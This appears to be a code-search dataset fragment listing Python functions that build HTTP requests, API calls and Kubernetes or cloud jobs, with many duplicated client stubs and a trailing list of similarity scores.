[ "def request_factory(self) -> 'JSONRPCRequest':\n return JSONRPCRequest()", "def post(self):\n data, errors = JobSchema().loads(request.data)\n\n if errors:\n return Response().send(\n data=None, status=400, code=\"bad_request\", message=errors\n )\n return self.job.create(request.json)", "def create_request(self, config):\n self.logger.info(\"Injecting request args:\\n%s ...\", config.request_args[\"createRequest\"])\n json_args = json.dumps(config.request_args[\"createRequest\"])\n urn = self.urn_prefix + \"/request\"\n status, data = self.http_request(\"POST\", urn, data=json_args,\n headers=self.headersBody)\n if status > 216:\n self.logger.error(\"Failed to create request with status: %s, data: %s\", status, data)\n sys.exit(1)\n data = json.loads(data)\n self.logger.info(data)\n request_name = data[\"result\"][0][\"request\"]\n self.approve_request(request_name)\n self.logger.info(\"Create request '%s' succeeded.\", request_name)\n\n config.request_names = request_name\n\n return request_name", "def _GenHttpRequestProto(self):\n request = jobs_pb2.HttpRequest()\n request.source_ip = \"127.0.0.1\"\n request.user_agent = \"Firefox or something\"\n request.url = \"http://test.com/test?omg=11%45x%20%20\"\n request.user = \"anonymous\"\n request.timestamp = int(time.time() * 1e6)\n request.size = 1000\n return request", "async def create_job(response: Response,\n request: Request,\n job: Job = Body(\n ...,\n example={\n \"id_video\": \"bbb_0.mp4\",\n \"bitrate\": 7000,\n \"speed\": \"ultrafast\",\n },\n )\n ): \n \n\n # get an ID and return to client\n id_job = mngr.getID()\n logger.debug(\"got id_job %s\" %id_job)\n resp = [\"http:/\"]\n resp.append(request.headers['host'])\n resp.append(id_job)\n response.headers[\"Location\"] = \"/\".join(resp)\n\n # create the task\n mngr.newJob(id_job, \n job.id_video, \n job.bitrate, \n job.speed)\n\n return id_job", "def create(self, resource, **data):\n body = ''\n if resource == 'robot/job':\n body = data['body']\n else:\n body = urllib.urlencode(data)\n\n return self.request('/' + resource, 'POST', body=body)", "def test_post_job(self):\n body = UnitTesterJobCreateReq()\n response = self.client.open(\n '/v1/job',\n method='POST',\n data=json.dumps(body),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def __init__(self, message, *args, **kwargs):\n Job.Service.__init__(self, *args, **kwargs)\n self.message = message", "def new_request(self, **kwargs):\n url = self.config[\"base_url\"]\n\n if kwargs.get(\"user_id\") is not None:\n url = url + kwargs[\"user_id\"]\n\n self.req = request.Request(host=self.config[\"host\"], protocol=constant.HTTP, url=url,\n method=kwargs[\"method\"], time_out=kwargs[\"timeout\"])\n\n return self", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n 
return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, 
global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, 
global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def test_create_namespaced_build_request_instantiate(self):\n pass", "def request_training():\n log = logger.new()\n request_content = flask.request.get_json()\n if request_content is None:\n log.error('frontend::train_request::invalid_json')\n flask.abort(415)\n\n training_request = extract_training_request(request_content)\n if training_request is None:\n log.error('frontend::train_request::invalid_request')\n flask.abort(400)\n\n job_id = _database_operations.create_new_job(training_request, Session())\n log.info('frontend::train_request::request_training', job_id=job_id)\n return job_id", "def jobserver_job():\n return _MakeJob()", "def _make_request(self, payload, headers=None):\n pathparts = REQ_PATH.split(b\"/\")\n if pathparts[0] == b\"\":\n pathparts = pathparts[1:]\n dreq = DummyRequest(pathparts)\n dreq.requestHeaders = Headers(headers or {})\n dreq.responseCode = 200 # default to 200\n\n if isinstance(payload, dict):\n payload = json.dumps(payload)\n\n dreq.content = BytesIO(payload.encode())\n dreq.method = \"POST\"\n\n return dreq", "def create_job(api_instance, job):\n api_response = api_instance.create_namespaced_job(\n body=job, namespace=\"default\", pretty=True\n )\n logger.info(\"Job created with status='%s'\" % 
str(api_response.status))\n return api_response", "def create_request(params={}, path='/', method='POST'):\n request = DummyRequest(path)\n request.method = method\n request.args = params\n return request", "def created_job(new_job, bulk_request):\n bulk_request.return_value = '''<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n <jobInfo xmlns=\"http://www.force.com/2009/06/asyncapi/dataload\">\n <id>THEJOBID</id>\n <operation>update</operation>\n <object>Lead</object>\n </jobInfo>\n '''\n new_job.create()\n return new_job", "def create_command_from_request(request: RequestInterface):", "def make_work_request(self):\n request = StoreRequest()\n self.bb_client.read_wait(request, self.handle_request)", "def create_custom_job(\n type,\n project,\n location,\n payload,\n gcp_resources,\n):\n remote_runner = job_remote_runner.JobRemoteRunner(\n type, project, location, gcp_resources\n )\n\n try:\n # Create custom job if it does not exist\n job_name = remote_runner.check_if_job_exists()\n if job_name is None:\n job_name = remote_runner.create_job(\n create_custom_job_with_client,\n insert_system_labels_into_payload(payload),\n )\n\n # Poll custom job status until \"JobState.JOB_STATE_SUCCEEDED\"\n remote_runner.poll_job(get_custom_job_with_client, job_name)\n except (ConnectionError, RuntimeError) as err:\n error_util.exit_with_internal_error(err.args[0])", "def req():\n return Request()", "def createRequest(self):\n self.get_bmc_website()\n self.__createChangeRequest = Create(self.browser)\n self.__createChangeRequest.createNCR()", "def make_request(self, environ, **kwargs):\n factory = self.get(abcs.ARequest)\n request = factory(environ, self, **kwargs)\n self._set_request_attributes(request)\n return request", "def _CreateRequest(self, url, data=None):\r\n logging.debug(\"Creating request for: '%s' with payload:\\n%s\", url, data)\r\n req = urllib2.Request(url, data=data, headers={\"Accept\": \"text/plain\"})\r\n if self.host_override:\r\n req.add_header(\"Host\", self.host_override)\r\n for key, value in self.extra_headers.iteritems():\r\n req.add_header(key, value)\r\n return req", "def test_api_post(httpretty, new_job):\n url = 'https://salesforce/services/async/34.0/job/THEJOBID'\n httpretty.register_uri('POST', url, status=201, body=b'some xml and stuff')\n response = new_job.request('post', url, data=b'stuff')\n assert response == b'some xml and stuff'\n assert httpretty.last_request().body == b'stuff'", "def create(cls, request):\n if isinstance(request, Request):\n request = request.prepare()\n\n # Method\n method = request.method.lower()\n\n # Cookies\n cookie = {}\n if request._cookies is not None:\n # cookies are stored in a cookiejar object\n cookie = request._cookies.get_dict()\n\n # Preparing a request formats the URL with params, strip them out again\n o = urlparse(request.url)\n params = parse_qs(o.query)\n # extract the URL without query parameters\n url = o._replace(query=None).geturl()\n\n # Order matters because all python requests issued from a session\n # include Accept */* which does not necessarily match the content type\n mimetype = request.headers.get(\"Content-Type\") or request.headers.get(\n \"Accept\"\n )\n\n # Headers - request.headers is not an instance of Headers\n # which is expected\n header = Headers(dict(request.headers))\n\n # Body\n # TODO: figure out if request._body_position is relevant\n body = request.body\n\n # Path gets deduced by path finder against spec\n parameters = RequestParameters(\n query=ImmutableMultiDict(params),\n header=header,\n 
cookie=cookie,\n )\n return OpenAPIRequest(\n full_url_pattern=url,\n method=method,\n parameters=parameters,\n body=body,\n mimetype=mimetype,\n )", "def createRequest(self, **kwargs):\n for k,v in kwargs.items():\n self.request[\"content\"][k] = v\n \n return self.request", "def create(self, obj):\r\n request = http.Request('POST', self.get_url(), self.wrap_object(obj))\r\n\r\n return request, parsers.parse_json", "def _CreateRequest(self, url, data=None):\n logging.debug(\"Creating request for: '%s' with payload:\\n%s\", url, data)\n req = urllib2.Request(url, data=data)\n if self.host_override:\n req.add_header(\"Host\", self.host_override)\n for key, value in self.extra_headers.iteritems():\n req.add_header(key, value)\n return req", "def create(self, **kwargs):\n url_str = self.base_url\n newheaders = self.get_headers()\n payload = kwargs['definition']\n resp, body = self.client.json_request('POST', url_str,\n data=payload,\n headers=newheaders)\n return resp", "def create_request(url, headers, attempts, request_type, data=None):\n request_func = getattr(requests, request_type)\n kwargs = {\"url\": url, \"headers\": headers}\n if request_type == \"post\" or request_type == \"patch\":\n kwargs[\"json\"] = data\n try:\n req = request_func(**kwargs)\n status_code = req.status_code\n time.sleep(1)\n while status_code >= 400 and attempts < 5:\n req = request_func(**kwargs)\n status_code = req.status_code\n attempts += 1\n time.sleep(1)\n return req\n except Exception as e:\n print(\"[ERROR] There was an error with the request, details:\")\n print(e)\n return None", "def create_request(v1):\n #get entered data\n data = request.get_json()\n\n #picking the request attributes\n req_title = data.get(\"request_title\")\n req_desc = data.get(\"request_description\")\n requester_name = \"Gideon\"\n req_id = len(all_requests) +1 # + random.randint(1, 3000)\n\n #validation\n if not req_title:\n return jsonify({\"message\": \"Request has no title\"}), 400\n if not req_desc:\n return jsonify({\"message\": \"Request has no description\"}), 400\n if not requester_name:\n return jsonify({\"message\": \"Request must be issued by a user\"}), 400\n if not req_id:\n return jsonify({\"message\": \"Request has no id\"}), 400\n\n #storing entered request\n new_request = MaintenanceRequest(req_title, req_desc, requester_name, req_id)\n all_requests.append(new_request)\n # new_number_of_requests = len(all_requests)\n\n return jsonify({\n \"message\":\"sucessfully created request\",\n 'request_title':new_request.title,\n \"request_description\":new_request.description,\n \"requester_name\" : new_request.requester_name,\n \"request_id\" : new_request.request_id\n })", "def _prepare_create_request(instance):\n parent_name = ('projects/' + instance._client.project)\n message = messages_v2_pb2.CreateInstanceRequest(\n parent=parent_name,\n instance_id=instance.instance_id,\n instance=data_v2_pb2.Instance(\n display_name=instance.display_name,\n ),\n )\n cluster = message.clusters[instance.instance_id]\n cluster.name = instance.name + '/clusters/' + instance.instance_id\n cluster.location = (\n parent_name + '/locations/' + instance._cluster_location_id)\n cluster.serve_nodes = instance._cluster_serve_nodes\n return message", "def send_job(self):\n graph = self.processgraphEdit.toPlainText()\n # info(self.iface, graph)\n response = self.connection.job_create(json.loads(graph))\n if response.status_code == 201:\n info(self.iface, \"Successfully created new job, Response: {}\".format(response.status_code))\n else:\n 
warning(self.iface, \"Not able to created new job, Response: {}\".format(str(response.json())))", "def newRequest(self):\n return Request( )", "def create_request(self):\n try:\n stock_name, request = self.text.split(\" \")\n print(stock_name)\n print(request)\n if request in run_commands.keys():\n endpoint: str = run_commands.get(request).get('endpoint')\n url_maker: str = f\"stocks/{stock_name}{endpoint}\"\n print(url_maker)\n response: Optional[str, Dict[str, str]] = self.make_request(method=\"GET\", endpoint=url_maker)\n if isinstance(response, dict):\n print(response)\n api_response: Dict[str, str] = slack_response.stock_info(stock_name, response.get(\"message\"))\n print(api_response)\n return api_response\n else:\n return \"release in progress\"\n except ValueError as e:\n return slack_response.help_response()\n except KeyError as e:\n return slack_response.help_response()", "def _request(self, *args, **kwargs):\n request = self._make_request(*args, **kwargs)\n\n return self._collect_request(request)", "def create_namespaced_build_request_instantiate(self, body, namespace, name, **kwargs):\n\n all_params = ['body', 'namespace', 'name', 'pretty']\n all_params.append('callback')\n\n params = locals()\n for key, val in iteritems(params['kwargs']):\n if key not in all_params:\n raise TypeError(\n \"Got an unexpected keyword argument '%s'\"\n \" to method create_namespaced_build_request_instantiate\" % key\n )\n params[key] = val\n del params['kwargs']\n\n # verify the required parameter 'body' is set\n if ('body' not in params) or (params['body'] is None):\n raise ValueError(\"Missing the required parameter `body` when calling `create_namespaced_build_request_instantiate`\")\n # verify the required parameter 'namespace' is set\n if ('namespace' not in params) or (params['namespace'] is None):\n raise ValueError(\"Missing the required parameter `namespace` when calling `create_namespaced_build_request_instantiate`\")\n # verify the required parameter 'name' is set\n if ('name' not in params) or (params['name'] is None):\n raise ValueError(\"Missing the required parameter `name` when calling `create_namespaced_build_request_instantiate`\")\n\n resource_path = '/oapi/v1/namespaces/{namespace}/buildconfigs/{name}/instantiate'.replace('{format}', 'json')\n path_params = {}\n if 'namespace' in params:\n path_params['namespace'] = params['namespace']\n if 'name' in params:\n path_params['name'] = params['name']\n\n query_params = {}\n if 'pretty' in params:\n query_params['pretty'] = params['pretty']\n\n header_params = {}\n\n form_params = []\n local_var_files = {}\n\n body_params = None\n if 'body' in params:\n body_params = params['body']\n\n # HTTP header `Accept`\n header_params['Accept'] = self.api_client.\\\n select_header_accept(['application/json', 'application/yaml'])\n if not header_params['Accept']:\n del header_params['Accept']\n\n # HTTP header `Content-Type`\n header_params['Content-Type'] = self.api_client.\\\n select_header_content_type(['*/*'])\n\n # Authentication setting\n auth_settings = []\n\n response = self.api_client.call_api(resource_path, 'POST',\n path_params,\n query_params,\n header_params,\n body=body_params,\n post_params=form_params,\n files=local_var_files,\n response_type='V1BuildRequest',\n auth_settings=auth_settings,\n callback=params.get('callback'))\n return response", "def CreateModel(self, request, timeout, metadata=None, with_call=False, protocol_options=None):\n raise NotImplementedError()", "def _request(self, method, url, payload=None, **params):\n 
kwargs = dict(params=params)\n kwargs[\"timeout\"] = self._timeout\n if not url.startswith('http'):\n url = self.prefix + url\n headers = self._auth_headers()\n headers['Content-Type'] = 'application/json'\n\n if payload:\n kwargs[\"data\"] = json.dumps(payload)\n gs = self._gpool.spawn if self._gpool else gevent.spawn\n r = gs(self.session.request, method, url, headers=headers, **kwargs)\n r.fetch = partial(self.join, r)\n update_wrapper(r.fetch, self.join)\n #gevent.sleep(0.05)\n return r", "def create_job_object(message, environment_image):\n\n PYTHONUNBUFFERED_ENV = client.V1EnvVar(name=\"PYTHONUNBUFFERED\", value=\"1\")\n AUTH_TOKEN_ENV = client.V1EnvVar(name=\"AUTH_TOKEN\", value=AUTH_TOKEN)\n EVALAI_API_SERVER_ENV = client.V1EnvVar(\n name=\"EVALAI_API_SERVER\", value=EVALAI_API_SERVER\n )\n MESSAGE_BODY_ENV = client.V1EnvVar(name=\"BODY\", value=json.dumps(message))\n submission_pk = message[\"submission_pk\"]\n image = message[\"submitted_image_uri\"]\n # Configureate Pod agent container\n agent_container = client.V1Container(\n name=\"agent\", image=image, env=[PYTHONUNBUFFERED_ENV]\n )\n # Configureate Pod environment container\n environment_container = client.V1Container(\n name=\"environment\",\n image=environment_image,\n env=[\n PYTHONUNBUFFERED_ENV,\n AUTH_TOKEN_ENV,\n EVALAI_API_SERVER_ENV,\n MESSAGE_BODY_ENV,\n ],\n resources=client.V1ResourceRequirements(\n limits={\"nvidia.com/gpu\": \"1\"}\n ),\n )\n # Create and configurate a spec section\n template = client.V1PodTemplateSpec(\n metadata=client.V1ObjectMeta(labels={\"app\": \"evaluation\"}),\n spec=client.V1PodSpec(\n containers=[environment_container, agent_container],\n restart_policy=\"Never\",\n ),\n )\n # Create the specification of deployment\n spec = client.V1JobSpec(backoff_limit=1, template=template)\n # Instantiate the job object\n job = client.V1Job(\n api_version=\"batch/v1\",\n kind=\"Job\",\n metadata=client.V1ObjectMeta(\n name=\"submission-{0}\".format(submission_pk)\n ),\n spec=spec,\n )\n return job" ]
[ "0.65077955", "0.6448152", "0.64046395", "0.63458514", "0.6320473", "0.63068354", "0.628952", "0.62621844", "0.6166124", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.6055981", "0.6033738", "0.59726167", "0.595618", "0.59204197", "0.5915558", "0.5879287", "0.5858012", "0.58424234", "0.58366823", "0.58345455", "0.58292747", "0.58204967", "0.58197796", "0.5815004", "0.580783", "0.57937104", "0.5769609", "0.5765096", "0.57418543", "0.5740205", "0.5738704", "0.5732825", "0.5723584", "0.57131755", "0.5709354", "0.56958896", "0.5681903", "0.5673356", "0.566901", "0.5666869" ]
0.0
-1
Returns a function to decide if log fetcher should continue polling.
def CheckJobComplete(self, name):
    request = self.messages.AiplatformProjectsLocationsCustomJobsGetRequest(
        name=name)
    response = self._service.Get(request)

    def ShouldContinue(periods_without_logs):
        if periods_without_logs <= 1:
            return True
        return response.endTime is None

    return ShouldContinue
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _do_request(self):\n\n if time.time() < self._next_request:\n return False\n else:\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\r\n return False", "def should_poll(self):\n return False", "def should_poll(self):\n return False", "def should_poll(self):\n return False", "def should_poll(self):\n return False", "def should_poll(self):\n return False", "def should_poll(self):\n return False", "def should_poll(self):\n return False", "def should_poll(self):\n return False", "def should_poll(self):\n return False", "def should_poll(self):\n return False", "def should_poll(self):\n return False", "def should_poll(self):\n return False", "def should_poll(self):\n return False", "def should_poll(self):\n return False", "def should_poll(self):\n return False", "def should_poll(self):\n return False", "def should_poll(self):\n return False", "def should_poll(self):\n return False", "def should_poll(self):\n return False", "def should_poll(self):\n return False", "def should_poll(self):\n return False", "def poll(self):\n return False", "def should_poll(self) -> bool:\n return True", "def should_poll(self) -> bool:\n return True", "def should_poll(self) -> bool:\n return True", "def should_poll(self) -> bool:\n return False", "def should_poll(self) -> bool:\n return False", "def should_poll(self) -> bool:\n return False", "def should_poll(self) -> bool:\n return False", "def should_poll(self) -> bool:\n return False", "def should_poll(self) -> bool:\n return False", "def should_poll(self) -> bool:\n return False", "def should_poll(self):\n return self.notifier.socket is not None", "def should_poll(self):\n return self._should_poll", "def issuer_liveness_check():\n global app_config\n\n if app_config[\"running\"]:\n # return True until we get a shutdown request\n return True\n\n # return True until the work queue is cleared\n return tob_connection_active()", "def check_status(self):\n log = logging.getLogger(\"%s.%s\" % (self.log_name,\n inspect.stack()[0][3]))\n log.setLevel(self.log_level)\n\n if self.url:\n return True\n try:\n result = requests.get(self.ext_url)\n self.url = self.ext_url\n return True\n except requests.exceptions.ConnectionError:\n pass\n try:\n result = requests.get(self.local_url)\n log.warning(\"Url '%s' not connecting. 
Using local_url '%s'\" % \\\n (self.ext_url, self.local_url))\n self.url = self.local_url\n return True\n except requests.exceptions.ConnectionError:\n self.url = None\n log.warning(\"Unable to connect using urls: %s\" % set([self.ext_url,\n self.local_url]))\n return False", "def is_polling_done(self):\n if self.message_request_more:\n return False\n \n if self.message_cache:\n return False\n \n return True", "def is_call_waiting(self) -> bool:", "def status_callback():\n if args['retire_idle']:\n return False\n\n return True", "def should_progress(self,\n\t\t\tperiod=constants.POLLING_BOOTSTRAP_PERIOD,\n\t\t\tnow=datetime.datetime.utcnow):\n\t\tnow_time = now()\n\t\tif self.next_start < now_time:\n\t\t\tlogging.info('Polling starting afresh for start time %s', self.next_start)\n\t\t\tself.last_start = self.next_start\n\t\t\tself.next_start = now_time + datetime.timedelta(seconds=period)\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False", "def is_poll(self):\n return self.subscription_list.mode == gnmi_pb2.SubscriptionList.POLL", "def nanny(self): \n while not self.started and not self.failed:\n eventlet.sleep(.1)\n return not self.failed", "def monitor(self, target):\n while self.RUNNING:\n check_time = datetime.now()\n next_check = check_time + timedelta(seconds=target[\"frequency\"])\n\n try:\n self.produce(\n get(target[\"url\"], timeout=target[\"frequency\"] - 0.5),\n target.get(\"regex\"),\n check_time,\n )\n except Timeout:\n self.logger.warning(\"Check for %s timed out\", target[\"url\"])\n except RequestException as e:\n self.logger.error(e)\n except re.error as e:\n self.logger.error(e)\n break\n\n # Busy loop until next check_time\n while datetime.now() < next_check:\n sleep(1)", "def precheck(self):\n # making sure it's a time for pull, otherwise just sleep\n if datetime.now() < self.startTime + timedelta(hours=int(self.newsFrequency)):\n logging.info(\"Didn't reach time to wakeup yet, going to sleep\")\n self.sleep()", "def check_for_lock_request(self):\n while True:\n sleep(0.1)\n if self.get_state():\n sleep(5)\n self.lock()\n break", "def IsStarted(self):\n for _ in range(5):\n if self.proxy_process.poll() is not None:\n # The process has exited.\n break\n try:\n up_url = '%s://localhost:%s/web-page-replay-generate-200'\n http_up_url = up_url % ('http', HTTP_PORT)\n https_up_url = up_url % ('https', HTTPS_PORT)\n if (200 == urllib.urlopen(http_up_url, None, {}).getcode() and\n 200 == urllib.urlopen(https_up_url, None, {}).getcode()):\n return True\n except IOError:\n time.sleep(1)\n return False", "def check_heartbeat(self):\n try:\n req = request(self.values['url'].data)\n response = urllib.urlopen(req)\n the_page = response.read()\n return True\n except urllib.HTTPError as e:\n if e.code == 400:\n return True\n else:\n logger.exception('[%s] - Exception when checking heartbeat')\n return False\n except Exception:\n logger.exception('[%s] - Exception when checking heartbeat')\n return False", "def toggle_polling(self):\n self.polling = not self.polling\n if not self.polling:\n # print('In toggle polling')\n self._stop_loop_feedback()\n self._start_loop_poll() if self.polling else self._stop_loop_poll()", "def is_async(self) -> bool:", "def _running_locally(coreapi_url, jobs_api_url):\n return not (coreapi_url and jobs_api_url)", "def should_poll(self):\n return self._command_state is not None", "def should_refresh_client_fnc(response):\n return not response", "def log_curl(self) -> bool:\n return self._log_curl", "def poll(self):\r\n if self.channel.is_available():\r\n 
self.serve()\r\n return True\r\n else:\r\n return False", "def log_once(key):\r\n\r\n global _last_logged\r\n\r\n if _disabled:\r\n return False\r\n elif key not in _logged:\r\n _logged.add(key)\r\n _last_logged = time.time()\r\n return True\r\n elif _periodic_log and time.time() - _last_logged > 60.0:\r\n _logged.clear()\r\n _last_logged = time.time()\r\n return False\r\n else:\r\n return False", "def _server_poll_expcompleted_(self):\n #print \"class Princeton_CCD function _server_poll_expcompleted_\" \n try:\n last_state = self.polled_running\n except (AttributeError,UnboundLocalError):\n self.polled_running = False\n last_state = False\n self.polled_running = self.query_running()\n if (not bool(last_state) and bool(self.polled_running)):\n self.begin_acq_time = time.time()\n #print self.query_running(), last_state\n #if ((last_state == True) and (self.polled_running == False)): CP\n if (bool(last_state) and not bool(self.polled_running)):\n self.end_acq_time = time.time()\n return True\n else:\n return False", "def poll(self):\n self.poll_function(self.connection)", "def should_sleep(self):\n return", "def needs_update(self, tweet_request: Request, refresh_rate: float = None) -> bool:\n if self.SOFT_RELOAD:\n if refresh_rate is None:\n refresh_rate = self.REFRESH_RATE\n filename = self.request_filename(tweet_request=tweet_request)\n if os.path.isfile(filename):\n stamp = os.path.getmtime(filename=filename)\n now = datetime.now().timestamp()\n if now - stamp > refresh_rate:\n return True\n else:\n return True\n return False", "def _can_ping_url(self, url, headers):\n try:\n self.http_request(url, \"GET\", \"\", headers, timeout=.75)\n return True\n except:\n return False", "def always_retry(e):\n return True", "def poll(self):\n now = time.time()\n if now > 